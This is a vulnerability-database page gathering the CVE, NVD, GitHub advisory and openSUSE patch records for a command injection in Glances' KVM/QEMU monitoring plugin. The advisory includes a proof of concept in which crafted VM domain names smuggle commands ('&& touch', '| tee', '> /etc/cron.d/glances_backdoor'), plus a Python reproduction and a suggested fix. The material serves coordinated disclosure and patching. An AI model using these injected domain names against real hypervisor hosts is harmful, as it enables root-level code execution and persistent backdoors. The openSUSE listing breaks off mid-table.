Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-46606 (GCVE-0-2026-46606)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:02 – Updated: 2026-06-25 18:29
VLAI
EPSS
Title
Glances: Command Injection via KVM/QEMU VM Domain Names in glances/plugins/vms/engines/virsh.py
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret &&, |, and > as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances — commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.
Severity
7.8 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46606",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:29:22.087082Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:29:51.267Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances \u2014 commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:02:14.168Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"source": {
"advisory": "GHSA-v5r2-qh84-fjx5",
"discovery": "UNKNOWN"
},
"title": "Glances: Command Injection via KVM/QEMU VM Domain Names in glances/plugins/vms/engines/virsh.py"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46606",
"datePublished": "2026-06-25T18:02:14.168Z",
"dateReserved": "2026-05-15T19:34:14.011Z",
"dateUpdated": "2026-06-25T18:29:51.267Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46606",
"date": "2026-06-26",
"epss": "0.00213",
"percentile": "0.11578"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46606\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-25T18:29:22.087082Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-25T18:29:46.224Z\"}}], \"cna\": {\"title\": \"Glances: Command Injection via KVM/QEMU VM Domain Names in glances/plugins/vms/engines/virsh.py\", \"source\": {\"advisory\": \"GHSA-v5r2-qh84-fjx5\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances \\u2014 commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:02:14.168Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46606\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-25T18:29:51.267Z\", \"dateReserved\": \"2026-05-15T19:34:14.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:02:14.168Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46606
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-25 19:58
Severity
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret &&, |, and > as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances — commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances \u2014 commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-46606",
"lastModified": "2026-06-25T19:58:30.847",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-46606",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:29:22.087082Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:37.380",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-V5R2-QH84-FJX5
Vulnerability from github – Published: 2026-06-22 21:14 – Updated: 2026-06-22 21:14
VLAI
Summary
Glances is Vulnerable to Command Injection via KVM/QEMU VM Domain Names in glances/plugins/vms/engines/virsh.py
Details
Summary
The Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret &&, |, and > as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances — commonly root on hypervisor hosts.
Details
Affected file: glances/plugins/vms/engines/virsh.py
Direct URLs (commit 04579778e733d705898a169e049dc84772c852da): - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/plugins/vms/engines/virsh.py#L185 - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/plugins/vms/engines/virsh.py#L204
The vulnerable calls are on lines 185 and 204:
# line 185 (update_stats)
ret_cmd = secure_popen(f'{VIRSH_PATH} {VIRSH_DOMAIN_STATS_OPTIONS} {domain}')
# line 204 (update_title)
ret_cmd = secure_popen(f'{VIRSH_PATH} {VIRSH_DOMAIN_TITLE_OPTIONS} {domain}')
domain is the name string parsed from the output of virsh list --all (line 59–78 in the same file); no sanitisation is applied to it at any point before it reaches secure_popen().
secure_popen() is defined in glances/secure.py. It explicitly splits the command string on &&, |, and > before invoking subprocess.Popen with shell=False on each part, meaning all three operators are treated as real pipeline/redirection control characters:
# glances/secure.py
def secure_popen(cmd):
ret = ''
for c in cmd.split('&&'): # '&&' → two separate processes
ret += __secure_popen(c)
return ret
def __secure_popen(cmd):
for sub_cmd in cmd.split('|'): # '|' → stdin/stdout piped
p = Popen(sub_cmd_split, shell=False, stdin=sub_cmd_stdin, stdout=PIPE, stderr=PIPE)
# '>' is split separately for file redirection
By contrast, actions.py sanitises process names through _sanitize_mustache_dict() before they reach secure_popen(). The vms plugin applies no such protection.
Confirmed on: x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).
All three injection operators were verified:
| Operator | Effect | Confirmed |
|---|---|---|
&& |
Second command executes after the virsh call | Yes |
\| |
Output of virsh piped to injected command | Yes |
> |
virsh output redirected to arbitrary file | Yes |
PoC
Special configuration required
- Glances must be configured to monitor a KVM/QEMU hypervisor: the
vmsplugin must be enabled and/usr/bin/virshmust be installed and executable. - The attacker must have libvirt domain-creation or domain-rename privileges (e.g. membership in the
libvirtgroup, a typical default on Ubuntu/Debian/Fedora, or a cloud-platform tenant account). - No custom
glances.confsettings are needed beyond a working virsh setup.
Step 1 — Create a VM with a crafted domain name
Using the && operator to chain a second command:
<domain type="kvm">
<name>productionDB && touch /tmp/glances_pwned</name>
<memory>131072</memory>
<vcpu>1</vcpu>
<os><type arch="x86_64">hvm</type></os>
</domain>
virsh define evil-domain.xml
Step 2 — Start Glances with KVM monitoring enabled
glances # or: glances -s / glances -w
On the next monitoring cycle Glances calls:
virsh domstats --nowait "productionDB && touch /tmp/glances_pwned"
which secure_popen() splits into two processes:
1. virsh domstats --nowait productionDB
2. touch /tmp/glances_pwned
Step 3 — Verify execution
ls -la /tmp/glances_pwned # file will exist, owned by the Glances user
Pipe injection (|) example
Domain name: "productionDB | tee /tmp/virsh_output_stolen.txt"
The output of the virsh call is piped to tee, writing the data to an attacker-controlled path.
File-write injection (>) example
Domain name: "productionDB > /etc/cron.d/glances_backdoor"
The virsh output is redirected to a cron file, enabling persistent code execution on the next cron cycle.
Minimal Python reproduction (no VM required)
import sys
sys.path.insert(0, '/path/to/glances') # adjust to local clone
from glances.secure import secure_popen
# Simulates the exact call in virsh.py line 185
domain = 'productionDB && id'
result = secure_popen(f'/bin/echo domstats --nowait {domain}')
print(result)
# Output will include two lines: the echo output AND the output of `id`
Impact
Vulnerability type: Command Injection (CWE-78)
Who is impacted: Any deployment of Glances on a KVM/QEMU hypervisor host where the vms plugin is active. Exploitation requires the attacker to have libvirt domain-creation or domain-rename rights — a privilege granted by default to members of the libvirt group and to cloud-platform tenant APIs.
Impact:
- Confidentiality: Full — arbitrary commands can exfiltrate secrets from the Glances process environment and the file system.
- Integrity: Full — file-write injection (>) allows placing content in any file writable by the Glances process (cron, authorised_keys, etc.).
- Availability: Full — the Glances process can be terminated or the host disrupted through the injected commands.
In cloud and multi-tenant virtualisation environments, Glances commonly runs as root on the hypervisor to access performance counters, so successful exploitation typically yields root-level code execution.
Suggested Fix
Replace the f-string interpolation with list-based argument passing to avoid any interaction with secure_popen()'s operator splitting logic:
# virsh.py — replace lines 185 and 204 with subprocess.run and explicit arg list from subprocess import run, PIPE
result = run(
[VIRSH_PATH, 'domstats', '--nowait', domain],
stdout=PIPE, stderr=PIPE, timeout=5
)
Alternatively, sanitise domain using the same _sanitize_mustache_dict helper already used in actions.py, which strips &&, |, >, ;, and backtick characters from string values.
As a defence-in-depth measure, consider running Glances under a dedicated low-privilege service account with CAP_SYS_PTRACE rather than as root.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
Severity
7.8 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46606"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:14:06Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe Glances KVM/QEMU monitoring engine (`glances/plugins/vms/engines/virsh.py`) passes VM domain names, read directly from `virsh list --all` output, into f-string command templates that are processed by `secure_popen()`. `secure_popen()` is explicitly designed to interpret `\u0026\u0026`, `|`, and `\u003e` as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances \u2014 commonly root on hypervisor hosts.\n\n---\n\n### Details\n\n**Affected file:** `glances/plugins/vms/engines/virsh.py`\n\n**Direct URLs (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/plugins/vms/engines/virsh.py#L185\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/plugins/vms/engines/virsh.py#L204\n\nThe vulnerable calls are on lines 185 and 204:\n\n```python\n# line 185 (update_stats)\nret_cmd = secure_popen(f\u0027{VIRSH_PATH} {VIRSH_DOMAIN_STATS_OPTIONS} {domain}\u0027)\n\n# line 204 (update_title)\nret_cmd = secure_popen(f\u0027{VIRSH_PATH} {VIRSH_DOMAIN_TITLE_OPTIONS} {domain}\u0027)\n```\n\n`domain` is the name string parsed from the output of `virsh list --all` (line 59\u201378 in the same file); no sanitisation is applied to it at any point before it reaches `secure_popen()`.\n\n`secure_popen()` is defined in `glances/secure.py`. It explicitly splits the command string on `\u0026\u0026`, `|`, and `\u003e` before invoking `subprocess.Popen` with `shell=False` on each part, meaning all three operators are treated as real pipeline/redirection control characters:\n\n```python\n# glances/secure.py\ndef secure_popen(cmd):\n ret = \u0027\u0027\n for c in cmd.split(\u0027\u0026\u0026\u0027): # \u0027\u0026\u0026\u0027 \u2192 two separate processes\n ret += __secure_popen(c)\n return ret\n\ndef __secure_popen(cmd):\n for sub_cmd in cmd.split(\u0027|\u0027): # \u0027|\u0027 \u2192 stdin/stdout piped\n p = Popen(sub_cmd_split, shell=False, stdin=sub_cmd_stdin, stdout=PIPE, stderr=PIPE)\n # \u0027\u003e\u0027 is split separately for file redirection\n```\n\nBy contrast, `actions.py` sanitises process names through `_sanitize_mustache_dict()` before they reach `secure_popen()`. The `vms` plugin applies no such protection.\n\n**Confirmed on:** x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).\n\nAll three injection operators were verified:\n\n| Operator | Effect | Confirmed |\n|----------|--------|-----------|\n| `\u0026\u0026` | Second command executes after the virsh call | Yes |\n| `\\|` | Output of virsh piped to injected command | Yes |\n| `\u003e` | virsh output redirected to arbitrary file | Yes |\n\n---\n\n### PoC\n\n**Special configuration required**\n\n* Glances must be configured to monitor a KVM/QEMU hypervisor: the `vms` plugin must be enabled and `/usr/bin/virsh` must be installed and executable.\n* The attacker must have libvirt domain-creation or domain-rename privileges (e.g. membership in the `libvirt` group, a typical default on Ubuntu/Debian/Fedora, or a cloud-platform tenant account).\n* No custom `glances.conf` settings are needed beyond a working virsh setup.\n\n**Step 1 \u2014 Create a VM with a crafted domain name**\n\nUsing the `\u0026\u0026` operator to chain a second command:\n\n```xml\n\u003cdomain type=\"kvm\"\u003e\n \u003cname\u003eproductionDB \u0026amp;\u0026amp; touch /tmp/glances_pwned\u003c/name\u003e\n \u003cmemory\u003e131072\u003c/memory\u003e\n \u003cvcpu\u003e1\u003c/vcpu\u003e\n \u003cos\u003e\u003ctype arch=\"x86_64\"\u003ehvm\u003c/type\u003e\u003c/os\u003e\n\u003c/domain\u003e\n```\n\n```bash\nvirsh define evil-domain.xml\n```\n\n**Step 2 \u2014 Start Glances with KVM monitoring enabled**\n\n```bash\nglances # or: glances -s / glances -w\n```\n\nOn the next monitoring cycle Glances calls:\n\n```\nvirsh domstats --nowait \"productionDB \u0026\u0026 touch /tmp/glances_pwned\"\n```\n\nwhich `secure_popen()` splits into two processes:\n1. `virsh domstats --nowait productionDB`\n2. `touch /tmp/glances_pwned`\n\n**Step 3 \u2014 Verify execution**\n\n```bash\nls -la /tmp/glances_pwned # file will exist, owned by the Glances user\n```\n\n**Pipe injection (`|`) example**\n\nDomain name: `\"productionDB | tee /tmp/virsh_output_stolen.txt\"`\n\nThe output of the virsh call is piped to `tee`, writing the data to an attacker-controlled path.\n\n**File-write injection (`\u003e`) example**\n\nDomain name: `\"productionDB \u003e /etc/cron.d/glances_backdoor\"`\n\nThe virsh output is redirected to a cron file, enabling persistent code execution on the next cron cycle.\n\n**Minimal Python reproduction (no VM required)**\n\n```python\nimport sys\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\nfrom glances.secure import secure_popen\n\n# Simulates the exact call in virsh.py line 185\ndomain = \u0027productionDB \u0026\u0026 id\u0027\nresult = secure_popen(f\u0027/bin/echo domstats --nowait {domain}\u0027)\nprint(result)\n# Output will include two lines: the echo output AND the output of `id`\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** Command Injection (CWE-78)\n\n**Who is impacted:** Any deployment of Glances on a KVM/QEMU hypervisor host where the `vms` plugin is active. Exploitation requires the attacker to have libvirt domain-creation or domain-rename rights \u2014 a privilege granted by default to members of the `libvirt` group and to cloud-platform tenant APIs.\n\n**Impact:**\n- **Confidentiality:** Full \u2014 arbitrary commands can exfiltrate secrets from the Glances process environment and the file system.\n- **Integrity:** Full \u2014 file-write injection (`\u003e`) allows placing content in any file writable by the Glances process (cron, authorised_keys, etc.).\n- **Availability:** Full \u2014 the Glances process can be terminated or the host disrupted through the injected commands.\n\nIn cloud and multi-tenant virtualisation environments, Glances commonly runs as root on the hypervisor to access performance counters, so successful exploitation typically yields root-level code execution.\n\n---\n\n### Suggested Fix\n\nReplace the f-string interpolation with list-based argument passing to avoid any interaction with `secure_popen()`\u0027s operator splitting logic:\n\n```python\n# virsh.py \u2014 replace lines 185 and 204 with subprocess.run and explicit arg list from subprocess import run, PIPE\n\nresult = run(\n [VIRSH_PATH, \u0027domstats\u0027, \u0027--nowait\u0027, domain],\n stdout=PIPE, stderr=PIPE, timeout=5\n)\n```\n\nAlternatively, sanitise `domain` using the same `_sanitize_mustache_dict` helper already used in `actions.py`, which strips `\u0026\u0026`, `|`, `\u003e`, `;`, and backtick characters from string values.\n\nAs a defence-in-depth measure, consider running Glances under a dedicated low-privilege service account with `CAP_SYS_PTRACE` rather than as root.\n\n---\n\n### Responsible Disclosure\n\nThe AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.\n\n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members\nof the AFINE Team.\n\n---",
"id": "GHSA-v5r2-qh84-fjx5",
"modified": "2026-06-22T21:14:06Z",
"published": "2026-06-22T21:14:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Glances is Vulnerable to Command Injection via KVM/QEMU VM Domain Names in glances/plugins/vms/engines/virsh.py"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00Summary
glances-common-4.5.5-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: glances-common-4.5.5-1.1 on GA media
Description of the patch: These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-11122
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.4 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
